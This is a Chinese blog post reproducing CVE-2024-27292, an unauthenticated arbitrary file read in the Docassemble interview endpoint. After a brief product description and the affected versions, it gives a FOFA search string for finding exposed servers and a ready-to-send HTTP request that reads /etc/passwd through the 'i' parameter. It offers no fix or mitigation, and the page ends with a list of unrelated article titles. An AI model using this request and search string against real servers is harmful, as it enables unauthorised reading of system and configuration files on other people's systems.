Docassemble interview 未授权任意文件读取漏洞复现(CVE-2024-27292)

0x01 产品简介

Docassemble是一款强大的开源工具,主要用于自动化生成和定制复杂文档,特别是在法律文档处理领域表现出色。由Jonathan Pyle个人开发者开发,是一个免费的开源专家系统,用于指导访谈和文档组装。Docassemble基于Python编写,充分利用了Python的灵活性和广泛的库支持。它采用YAML格式定义访谈逻辑,这种数据交换语言简洁且易于理解,使得非程序员也能轻松上手创建复杂的问答流程。

0x02 漏洞概述

Docassemble interview 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 影响范围

Docassemble <=1.4.96

0x04 复现环境

FOFA:icon_hash="-575790689"

0x05 漏洞复现 

PoC

GET /interview?i=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-11 19:52:02       66 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-11 19:52:02       70 阅读
  3. 在Django里面运行非项目文件

    2024-07-11 19:52:02       57 阅读
  4. Python语言-面向对象

    2024-07-11 19:52:02       68 阅读

热门阅读

  1. C++:set和map

    2024-07-11 19:52:02       23 阅读
  2. YOLO v8进行目标检测的遇到的bug小结

    2024-07-11 19:52:02       19 阅读
  3. 数据建设实践之数据规范

    2024-07-11 19:52:02       21 阅读
  4. Google订阅补坑

    2024-07-11 19:52:02       23 阅读
  5. 低代码开发在金融系统中的应用研究

    2024-07-11 19:52:02       19 阅读
  6. conda 创建新的虚拟环境报错

    2024-07-11 19:52:02       21 阅读
  7. C++处理json数据注意点(url传递接收json数据)

    2024-07-11 19:52:02       20 阅读
  8. Windows批处理指令与Shell的关系

    2024-07-11 19:52:02       19 阅读
  9. 模电基础 - 直流电源

    2024-07-11 19:52:02       23 阅读
  10. Python魔法函数(Magic Methods简介

    2024-07-11 19:52:02       23 阅读
  11. C语言 输出n阶魔方阵

    2024-07-11 19:52:02       24 阅读
  12. ARM/Linux嵌入式面经(十一):地平线嵌入式实习

    2024-07-11 19:52:02       22 阅读
  13. xss攻击

    2024-07-11 19:52:02       22 阅读
  14. Rust简明教程第六章-错误处理&生命周期

    2024-07-11 19:52:02       25 阅读
  15. 【Django】Django 使用连接串配置数据库

    2024-07-11 19:52:02       22 阅读
  16. Sass 和 SCSS

    2024-07-11 19:52:02       19 阅读
  17. 系统迁移从CentOS7.9到Rocky8.9

    2024-07-11 19:52:02       23 阅读
  18. 深入理解CSS中的块格式化上下文(BFC)

    2024-07-11 19:52:02       21 阅读